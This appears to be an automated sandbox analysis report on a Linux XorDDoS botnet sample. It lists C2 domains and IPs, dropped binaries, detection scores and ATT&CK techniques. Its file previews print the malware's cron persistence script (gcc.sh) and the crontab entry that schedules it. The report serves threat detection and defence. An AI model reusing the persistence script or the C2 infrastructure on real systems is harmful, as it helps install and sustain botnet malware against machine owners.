Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9783, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9794, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9805, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9827, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9838, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9849, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9860, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9871, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9882, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9893, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9915, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9926, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9937, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9948, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9959, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9970, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9981, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 9994, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10005, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10027, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10038, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10049, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iJl2Sb6qRa PID: 10060, type: MEMORYSTR
Source: Yara match	File source: /lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/wzhmvohlxs, type: DROPPED
Source: Yara match	File source: /usr/bin/hiueshutol, type: DROPPED
Source: Yara match	File source: /usr/bin/mhvrcmaysv, type: DROPPED
Source: Yara match	File source: /usr/bin/lnmgbribvb, type: DROPPED
Source: Yara match	File source: /usr/bin/hgfzmygnbx, type: DROPPED
Source: Yara match	File source: /usr/bin/wdcujvrbpo, type: DROPPED
Source: Yara match	File source: /usr/bin/dezqblvxuy, type: DROPPED
Source: Yara match	File source: /usr/bin/chdmwyeiia, type: DROPPED
Source: Yara match	File source: /usr/bin/ckxgqrmzxa, type: DROPPED
Source: Yara match	File source: /usr/bin/lsodknzpps, type: DROPPED
Source: Yara match	File source: /usr/bin/eoqlmyvucn, type: DROPPED
Source: Yara match	File source: /usr/bin/cjfywultqo, type: DROPPED
Source: Yara match	File source: /usr/bin/zbksjhrfms, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	1 Systemd Service	1 Systemd Service	11 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Non-Standard Port	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 At (Linux)	2 At (Linux)	2 At (Linux)	1 Scripting	LSASS Memory	2 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Malware Configuration

Threatname: XorDDoS

{"C2 list": ["http://aa.hostasa.org/config.rar\u0000tat456.com:1522", "ppp.gggatat456.com:1522"]}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
iJl2Sb6qRa	68%	ReversingLabs	Linux.Network.XorDDoS
iJl2Sb6qRa	66%	Virustotal		Browse
iJl2Sb6qRa	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
/usr/bin/emnaztxelb	100%	Avira	LINUX/Xorddos.ygevo
/usr/bin/wzhmvohlxs	100%	Joe Sandbox ML
/usr/bin/cjfywultqo	100%	Joe Sandbox ML
/usr/bin/emnaztxelb	100%	Joe Sandbox ML
/usr/bin/zbksjhrfms	100%	Joe Sandbox ML
/usr/bin/mhvrcmaysv	100%	Joe Sandbox ML
/lib/libudev.so	100%	Joe Sandbox ML
/usr/bin/wdcujvrbpo	100%	Joe Sandbox ML
/usr/bin/eoqlmyvucn	100%	Joe Sandbox ML
/usr/bin/dezqblvxuy	100%	Joe Sandbox ML
/usr/bin/hgfzmygnbx	100%	Joe Sandbox ML
/usr/bin/hiueshutol	100%	Joe Sandbox ML
/usr/bin/chdmwyeiia	100%	Joe Sandbox ML
/usr/bin/lnmgbribvb	100%	Joe Sandbox ML
/usr/bin/ckxgqrmzxa	100%	Joe Sandbox ML
/usr/bin/lsodknzpps	100%	Joe Sandbox ML
/etc/cron.hourly/gcc.sh	28%	ReversingLabs	Linux.Trojan.XorDDoS
/lib/libudev.so	68%	ReversingLabs	Linux.Network.XorDDoS
/usr/bin/emnaztxelb	17%	ReversingLabs	Linux.Network.Xor

Domains

Source	Detection	Scanner	Label	Link
ppp.gggatat456.com	13%	Virustotal		Browse
aa.hostasa.org	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
ppp.gggatat456.com:1522	100%	Avira URL Cloud	malware
http://aa.hostasa.org/config.rar	100%	Avira URL Cloud	malware
http://aa.hostasa.org/config.rartat456.com:1522	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ppp.gggatat456.com	54.36.145.106	true	true	13%, Virustotal, Browse	unknown
aa.hostasa.org	199.59.243.223	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://aa.hostasa.org/config.rar	true	Avira URL Cloud: malware	unknown
http://aa.hostasa.org/config.rartat456.com:1522	true	Avira URL Cloud: malware	unknown
ppp.gggatat456.com:1522	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	iJl2Sb6qRa, 9552.1.0000000008e7b000.0000000008e9c000.rw-.sdmp, iJl2Sb6qRa, 9563.1.0000000008e7b000.0000000008e9c000.rw-.sdmp	false		high
http://www.gnu.org/software/libc/bugs.html	iJl2Sb6qRa, wzhmvohlxs.7.dr, cjfywultqo.7.dr, zbksjhrfms.7.dr, mhvrcmaysv.7.dr, libudev.so.7.dr, wdcujvrbpo.7.dr, eoqlmyvucn.7.dr, dezqblvxuy.7.dr, hgfzmygnbx.7.dr, hiueshutol.7.dr, chdmwyeiia.7.dr, lnmgbribvb.7.dr, ckxgqrmzxa.7.dr, lsodknzpps.7.dr	false		high
http://aa.hostasa.org/config.rartat456.com:1522	iJl2Sb6qRa, 9451.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9454.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9457.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9462.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9552.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9563.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9574.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9585.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9596.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9607.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9618.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9629.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9640.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9651.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9662.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9673.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9684.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9695.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9706.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9717.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp, iJl2Sb6qRa, 9728.1.00000000ffc2a000.00000000ffc4b000.rw-.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
199.59.243.223	aa.hostasa.org	United States		395082	BODIS-NJUS	true
54.36.145.106	ppp.gggatat456.com	France		16276	OVHFR	true

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.59.243.223	SecuriteInfo.com.Variant.Babar.161191.3845.26747.exe	Get hash	malicious	FormBook	Browse	www.brandbenefitplaybook.com/d82s/?1EIysb=EWoZ&10f=hZymMWi8OIpcvwrq+yvgylp3rZSyTuKi7aUoMF0D4T525J6S8xrli2or7uKJzNj4i4UTIdpwu3zJDJUSoFjqT45bX7IdlJUbmQ==
	nsg5uov8KS.exe	Get hash	malicious	FormBook	Browse	www.brandbenefitplaybook.com/npd2/?V99=xTNX35RgV2Vh5y+G2fR7vi+M5aQ5m1G8qKcD6Gc4Uv6uCgtW2sniqqX6ZuWOd27sZ3PQhU3BDXPlNMtFbiQi0Y2Z/X1XGLi4ag==&Ym1=FRuIj
	led_cmds.exe	Get hash	malicious	Unknown	Browse	h1.ripway.com/sdb00050/setting.ini
	system3_.exe	Get hash	malicious	Unknown	Browse	h1.ripway.com/sdb00050/setting.ini
	modules.exe	Get hash	malicious	Unknown	Browse	h1.ripway.com/sdb00050/setting.ini
	file.exe	Get hash	malicious	FormBook, Play	Browse	www.pointman.us/g2fg/?4hcPZDI=1ZbWzwWBWxEdGhy/e82kp5544c8o4bU6/C/4k5IuQdOu/iNANdrsX0vcj9fJurvqheTccFw6SQ==&5jO8=DFNPA2
	Quotation.exe	Get hash	malicious	FormBook, Play	Browse	www.macmedicrepairs.co.uk/gp8u/?uv9=hSR/tCoT8hHBkIaqubFAVGjyBiHPaNULdPNwgzle7vIh+/7EWbIM+YqAen3SD8dJbyktpYUrVXqoAuBEs2m8Vu9CVfQn9o2pXQ==&UTACh=_JfvH1eSpT
	rBillOfQuantity.exe	Get hash	malicious	FormBook, Play	Browse	www.englishsongs.online/jr22/?6l=vuC9WrwZzaft5wQPdsJ9DwyF8vmbJmHwaeUvChuVq1w0skLPtiZNko0q8HEaPBveCAO4&k67TO=3fUlj4
	ORDER_NOTIFICATION_pdf.exe	Get hash	malicious	FormBook, Play	Browse	www.192exchange.com/u5rs/?ST0x-=V6fqq&5No=tOWjj3FeIBVa7p90xwPxeRATz1E38Fj7HQAlNpBqOWrq90TjlLUP8u7nzYDbkXbeRKNjZReZY+YssjdiGYq3pamYnpi+rxcrnw==
	Specifications.exe	Get hash	malicious	FormBook, Play	Browse	www.bimeyes.com/lf80/?jsON=fVXesP&RB=hU9hUyFyor7oqDBCHcmc4+FchluUI7/Y5cDxSzUspsL7W3t0RoYhUWyy6sdd1Eh9/U+YV96YTX7baYjLWAzCxjcH3fxBN54S2gZeEhxCbEbu
	NiNjector.exe	Get hash	malicious	Luca Stealer, Rusty Stealer, Xmrig	Browse	ww25.files.zerobytez.xyz/iversion.txt?subid1=20230329-1552-265c-b54f-75c0d8630e64
	Invoice.exe	Get hash	malicious	FormBook	Browse	www.192exchange.com/cz5n/?dtmX=sixtQWidSTSxGO51TCGh8sp1YomJtzaBir6XCsRB79BaMvvCo7B3qN8D1XhQvE/wsY3ZBtw9YYJxGtKl3M5ybLLq2LHto5fSEg==&ZTN=4rscfjM9BwPP
	Scientize.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cartracker.store/qjrd/?33x=8jZJUA7Vq8O/DdyumrhpVnDEm0/P/jE/GLkXquz2m9aZ00hmlmBez7Tjh+fwG+Zt7l4Vv8xlP+fYgYxkBtvqY5i+O+O6SV84cA==&eg8JW_=3wDLr
	Dissensers.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.cartracker.store/qjrd/?IMmk=8jZJUA7Vq8O/DdyumrhpVnDEm0/P/jE/GLkXquz2m9aZ00hmlmBez7Tjh+fwG+Zt7l4Vv8xlP+fYgYxkBtvqY5i+O+O6SV84cA==&WAZN2=jtS0S7yENCzsUO
	32AC0624A534A2C40FB8EBA41E80BB1D31B99CD118D42.exe	Get hash	malicious	FFDroider, ManusCrypt, Nitol, PrivateLoader, SmokeLoader, Socelars	Browse	ww25.listincode.com/?subid1=20230327-1817-2264-ae5b-a3ddd52a1144
	XBAo84Asbf.exe	Get hash	malicious	FormBook	Browse	www.watsonwindow.com/jr22/?DX6pO=CpKpdfR&3fcLj=p7LnA046D/tJFaGJkr9UCUw9sKN7iJwXLzW4LELm4l9fHtkcqDl/d4PNA203FE90gGqM
	https://workflowy.com/s/provident-constructi/6eFbKO3TcHp1BNGs	Get hash	malicious	HTMLPhisher	Browse	ww1.mcl.com/_tr
	rquotationorda.exe	Get hash	malicious	FormBook	Browse	www.apollobenfitservices.com/n13e/?y0DH=7I46PhRl6kstEe4R9y0xglygEtYT0Bn6/qq3TCfBxGrmEgYQFUbTuxvXcK4/adRK7CpK&ER-T=3frLULJ
	Return_Slip.exe	Get hash	malicious	FormBook	Browse	www.macmedicrepairs.co.uk/gp8u/?FH_x4Ur=hSR/tCoT8hHBkIaqubFAVGjyBiHPaNULdPNwgzle7vIh+/7EWbIM+YqAen3SD8dJbyktpYUrVXqoAuBEs2mxPeJgRfgV6deiBAQsOr56fYR+&RN6cKe=XUk1GKFX6
	Shipping_documents.exe	Get hash	malicious	FormBook	Browse	www.piergitarshoes.com/rs5b/?9IVmWTX=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRyqSPW6kRpf0Q/Lw==&ZGE=ASownF6Ao

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ppp.gggatat456.com	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse	79.137.1.133
	xor1.o	Get hash	malicious	XorDDoS	Browse	176.31.91.137
	0Xorddos.o	Get hash	malicious	XorDDoS	Browse	54.36.145.106
	XZFWLZVF1Z	Get hash	malicious	XorDDoS	Browse	54.36.15.99
	CD2uXlYGfa	Get hash	malicious	XorDDoS	Browse	51.68.183.111
	7ZDbt9EUgm	Get hash	malicious	XorDDoS	Browse	51.89.70.85
	ygljglkjgfg0	Get hash	malicious	XorDDoS	Browse	51.89.52.13
	2wyzX8yBdR	Get hash	malicious		Browse	51.38.200.187
aa.hostasa.org	23	Get hash	malicious	XorDDoS	Browse	99.83.154.118
	XZFWLZVF1Z	Get hash	malicious	XorDDoS	Browse	99.83.154.118
	EgrT0zBhDa	Get hash	malicious	XorDDoS	Browse	99.83.154.118

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BODIS-NJUS	SecuriteInfo.com.Variant.Babar.161191.3845.26747.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	nsg5uov8KS.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	http://lkasyu.xyz	Get hash	malicious	Unknown	Browse	199.59.242.153
	MDE_File_Sample_cd2983840fe8c8adbc070cdb4a478be93cf7989a.zip	Get hash	malicious	Unknown	Browse	199.59.243.223
	MDE_File_Sample_cd2983840fe8c8adbc070cdb4a478be93cf7989a.zip	Get hash	malicious	Unknown	Browse	199.59.243.223
	led_cmds.exe	Get hash	malicious	Unknown	Browse	199.59.243.223
	system3_.exe	Get hash	malicious	Unknown	Browse	199.59.243.223
	modules.exe	Get hash	malicious	Unknown	Browse	199.59.243.223
	file.exe	Get hash	malicious	FormBook, Play	Browse	199.59.243.223
	Quotation.exe	Get hash	malicious	FormBook, Play	Browse	199.59.243.223
	rBillOfQuantity.exe	Get hash	malicious	FormBook, Play	Browse	199.59.243.223
	ORDER_NOTIFICATION_pdf.exe	Get hash	malicious	FormBook, Play	Browse	199.59.243.223
	Specifications.exe	Get hash	malicious	FormBook, Play	Browse	199.59.243.223
	NiNjector.exe	Get hash	malicious	Luca Stealer, Rusty Stealer, Xmrig	Browse	199.59.243.223
	Invoice.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	Scientize.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.223
	Dissensers.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.223
	32AC0624A534A2C40FB8EBA41E80BB1D31B99CD118D42.exe	Get hash	malicious	FFDroider, ManusCrypt, Nitol, PrivateLoader, SmokeLoader, Socelars	Browse	199.59.243.223
	XBAo84Asbf.exe	Get hash	malicious	FormBook	Browse	199.59.243.223
	E461562A06F4C2CEA8CC91D9FC6FD75F393B79030D646.exe	Get hash	malicious	ManusCrypt, Nitol, SmokeLoader, Vidar	Browse	199.59.243.223

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/cron.hourly/gcc.sh	Di1p3oLnDb.elf	Get hash	malicious	XorDDoS	Browse
	fuck.elf	Get hash	malicious	XorDDoS	Browse
	dkuidbsedp	Get hash	malicious	XorDDoS	Browse
	libudev.so	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse
	23.vir	Get hash	malicious	XorDDoS	Browse
	xor1.o	Get hash	malicious	XorDDoS	Browse
	CCCxor.o	Get hash	malicious	XorDDoS	Browse
	2BAFxor.o	Get hash	malicious	XorDDoS	Browse
	task2.bin	Get hash	malicious	XorDDoS	Browse
	task2.bin	Get hash	malicious	XorDDoS	Browse
	task2.bin	Get hash	malicious	XorDDoS	Browse
	0Xorddos.o	Get hash	malicious	XorDDoS	Browse
	x.o	Get hash	malicious	XorDDoS	Browse
	23	Get hash	malicious	XorDDoS	Browse
	23	Get hash	malicious	XorDDoS	Browse
	XZFWLZVF1Z	Get hash	malicious	XorDDoS	Browse
	EgrT0zBhDa	Get hash	malicious	XorDDoS	Browse
	4ljhdTTyiA	Get hash	malicious	XorDDoS	Browse
	7nJAEBDitl	Get hash	malicious	XorDDoS	Browse

Created / dropped Files

/etc/cron.hourly/gcc.sh

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	228
Entropy (8bit):	4.807897441464882
Encrypted:	false
SSDEEP:	3:TKH4v1kxtsLNELQ9YmPQnMLnVMPQmlZnEMFaGZg28Xwf6SkCVcLNGLC75pkVKJdm:htiy4Mrm9lVNy28XbCVP270gJdE/v
MD5:	3BAB747CEDC5F0EBE86AAA7F982470CD
SHA1:	3C7D1C6931C2B3DAE39D38346B780EA57C8E6142
SHA-256:	74D31CAC40D98EE64DF2A0C29CEB229D12AC5FA699C2EE512FC69360F0CF68C5
SHA-512:	21E8A6D9CA8531D37DEF83D8903E5B0FA11ECF33D85D05EDAB1E0FEB4ACAC65AE2CF5222650FB9F533F459CCC51BB2903276FF6F827B847CC5E6DAC7D45A0A42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 28%
Joe Sandbox View:	Filename: Di1p3oLnDb.elf, Detection: malicious, Browse Filename: fuck.elf, Detection: malicious, Browse Filename: dkuidbsedp, Detection: malicious, Browse Filename: libudev.so, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: 23.vir, Detection: malicious, Browse Filename: xor1.o, Detection: malicious, Browse Filename: CCCxor.o, Detection: malicious, Browse Filename: 2BAFxor.o, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: task2.bin, Detection: malicious, Browse Filename: 0Xorddos.o, Detection: malicious, Browse Filename: x.o, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: 23, Detection: malicious, Browse Filename: XZFWLZVF1Z, Detection: malicious, Browse Filename: EgrT0zBhDa, Detection: malicious, Browse Filename: 4ljhdTTyiA, Detection: malicious, Browse Filename: 7nJAEBDitl, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin.for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done.cp /lib/libudev.so /lib/libudev.so.6./lib/libudev.so.6.

/etc/crontab

Download File

Process:	/bin/dash
File Type:	ASCII text
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.8484226636198593
Encrypted:	false
SSDEEP:	3:FFP13tKebPv4KFcKv:/P1IebPPFcKv
MD5:	636299E19F3BFB8CDA661BC956C1CE7F
SHA1:	2B45273CCBFE139D58FC3554D6943D4338C18E15
SHA-256:	8CBDE8A027F2887DD7A3C5C6F98FDF127BAE31FE457FEF9D7945C9E48D195F44
SHA-512:	41AF1A49B86C9C81965AF32B404494CC5072AFDA004F385977110F8EA134A770650CBD2F9617AFCD87D6744954659BE4AE365E65DCA4491A375275E710310F1A
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	/3 * * * root /etc/cron.hourly/gcc.sh.

/etc/init.d/.depend.boot

Download File

Process:	/usr/lib/insserv/insserv
File Type:	ASCII text, with very long lines (417)
Category:	dropped
Size (bytes):	1380
Entropy (8bit):	4.6286085863457025
Encrypted:	false
SSDEEP:	24:KcR684NIwOkJVARL9Eg3U3PX2xRmbUtOeAyh1ZFDSYpY3dOUwZlY:VR6843OkjARLq0U3PX2xYwtOQh1vDTp8
MD5:	5B62F52693F19BAD0D1373AB955F17B8
SHA1:	3865ED303BD83951D0D69D87A6290F120A937C2E
SHA-256:	9026F82085CF03BE408767439E4FD595F266FE6F11ECC4A3AF7F0555ED358196
SHA-512:	E0015AA580EAAFFF64D59F666FDC91280AAC50C10D5189A13B376E3C9DC71A0FE019D7EE05351F1136F65F5F1CAE6C58D781CBA2E073D57E323629BF5137BE25
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	TARGETS = console-setup resolvconf alsa-utils mountkernfs.sh ufw plymouth-log hostname.sh lm-sensors screen-cleanup pppd-dns apparmor x11-common udev keyboard-setup mountdevsubfs.sh brltty procps qemu-kvm cryptdisks cryptdisks-early hwclock.sh open-iscsi networking iscsid checkroot.sh lvm2 urandom checkfs.sh mountall.sh mountall-bootclean.sh bootmisc.sh kmod mountnfs.sh checkroot-bootclean.sh mountnfs-bootclean.sh.INTERACTIVE = console-setup udev keyboard-setup cryptdisks cryptdisks-early checkroot.sh checkfs.sh.udev: mountkernfs.sh.keyboard-setup: mountkernfs.sh udev.mountdevsubfs.sh: mountkernfs.sh udev.brltty: mountkernfs.sh udev.procps: mountkernfs.sh udev.qemu-kvm: mountkernfs.sh udev.cryptdisks: checkroot.sh cryptdisks-early udev lvm2.cryptdisks-early: checkroot.sh udev.hwclock.sh: mountdevsubfs.sh.open-iscsi: networking iscsid.networking: resolvconf mountkernfs.sh urandom procps.iscsid: networking.checkroot.sh: hwclock.sh mountdevsubfs.sh hostname.sh keyboard-setup.lvm2: cryptdi

/etc/init.d/.depend.start

Download File

Process:	/usr/lib/insserv/insserv
File Type:	ASCII text, with very long lines (317)
Category:	dropped
Size (bytes):	1699
Entropy (8bit):	4.655185645871376
Encrypted:	false
SSDEEP:	48:ZuINySAzo1kW27ZGme/9/n2UG+/9/n2UGo/9/n2UG8h/9/n2UGM:JWo1n27keU/eUbeUfeUF
MD5:	DC4067DA8299345F3EA8B6A7C7BE050A
SHA1:	3C07717E87B0CA551251A5679B49849835FB5BA4
SHA-256:	288447265D681276F37FB61857049204F0AA8C96A0E5026E2EC39C2501782AF0
SHA-512:	8D6FBDAD10DB64EA5E5E396B1E20943800810C7F99341BFDFA87AA588239B01A6EDA2E86EC62A11F5A8F58F14740CB05A287BA24C55CA83CA186851A6AC8CA38
Malicious:	true
Reputation:	low
Preview:	TARGETS = rsyslog unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs iJl2Sb6qRa killprocs binfmt-support apport mdadm dbus speech-dispatcher hddtemp kerneloops irqbalance single whoopsie rsync ssh acpid lightdm bluetooth avahi-daemon cups-browsed saned plymouth grub-common ondemand rc.local.INTERACTIVE =.mdadm: rsyslog.dbus: rsyslog.speech-dispatcher: rsyslog.hddtemp: rsyslog.kerneloops: rsyslog.irqbalance: rsyslog.single: killprocs iJl2Sb6qRa.whoopsie: rsyslog.rsync: rsyslog.ssh: rsyslog.acpid: rsyslog.lightdm: dbus acpid.bluetooth: rsyslog dbus.avahi-daemon: dbus rsyslog.cups-browsed: rsyslog.saned: rsyslog dbus.plymouth: rsyslog mdadm unattended-upgrades open-vm-tools cups-browsed lvm2-lvmetad uuidd dbus speech-dispatcher lxd hddtemp kerneloops lightdm bluetooth irqbalance lvm2-lvmpolld avahi-daemon lxcfs iJl2Sb6qRa saned whoopsie rsync ssh acpid binfmt-support apport.grub-common: rsyslog mdadm unattended-upgrades open-vm-tools cups-browsed lvm2-lvmetad uui

/etc/init.d/.depend.stop

Download File

Process:	/usr/lib/insserv/insserv
File Type:	ASCII text, with very long lines (425)
Category:	dropped
Size (bytes):	1690
Entropy (8bit):	4.52194295219339
Encrypted:	false
SSDEEP:	48:3Yu8rBj1G4GJ/suwT2UKGhuw2zOsuwK2UPOiNQh/4uwHFn2U5wT:M1iUJeZU1cU0
MD5:	7897338A208ABF2E5C95E7994A24F8C8
SHA1:	185E660978A050BD66B62C6AF44695251A373390
SHA-256:	7143B8292EB1C2476411ECA94A4A67E5A166C9FB916724B3458247D1C0E1F5CB
SHA-512:	F322DB116C7DE93E68D9709B8E2CE8163BC1E0BEB264D5D178815DB839FFB3E88AF4C17B4095BFB60A579B103CE48D67B1A257CA3394FCFD46FDA97A473C2632
Malicious:	true
Preview:	TARGETS = atd network-manager cups anacron cron unattended-upgrades open-vm-tools lvm2-lvmetad uuidd lxd lvm2-lvmpolld lxcfs mdadm resolvconf speech-dispatcher hddtemp alsa-utils kerneloops irqbalance ufw whoopsie lightdm bluetooth cups-browsed saned plymouth open-iscsi urandom avahi-daemon iscsid sendsigs rsyslog umountnfs.sh hwclock.sh networking umountfs cryptdisks cryptdisks-early umountroot mdadm-waitidle halt reboot.avahi-daemon: cups-browsed saned.iscsid: open-iscsi.sendsigs: atd mdadm open-iscsi unattended-upgrades open-vm-tools cups-browsed plymouth uuidd network-manager speech-dispatcher lxd hddtemp iscsid alsa-utils kerneloops lightdm bluetooth irqbalance avahi-daemon lxcfs.rsyslog: atd mdadm sendsigs cups-browsed network-manager speech-dispatcher hddtemp kerneloops bluetooth irqbalance avahi-daemon cups saned whoopsie.umountnfs.sh: atd unattended-upgrades open-vm-tools rsyslog cups-browsed plymouth uuidd network-manager speech-dispatcher lxd hddtemp sendsigs alsa-utils kern

/etc/init.d/iJl2Sb6qRa

Download File

Process:	/tmp/iJl2Sb6qRa
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.2791191373405315
Encrypted:	false
SSDEEP:	6:hUtoFdU9ybnsKheJHRNSGBE21YJvmNeMwhzn11DzRIhZ3a6MzEZ3q4:68bmHnjBEMO1LXzuSzA
MD5:	7CA3BBEA566676A6243E4CCF8CCE49E6
SHA1:	A8916AC71E437641E3EA40603F072C5E5EC2CB9A
SHA-256:	E07EA6CB70D1B389CD71C945E0DF98BC83A20E69CBF98016182691E271208F4F
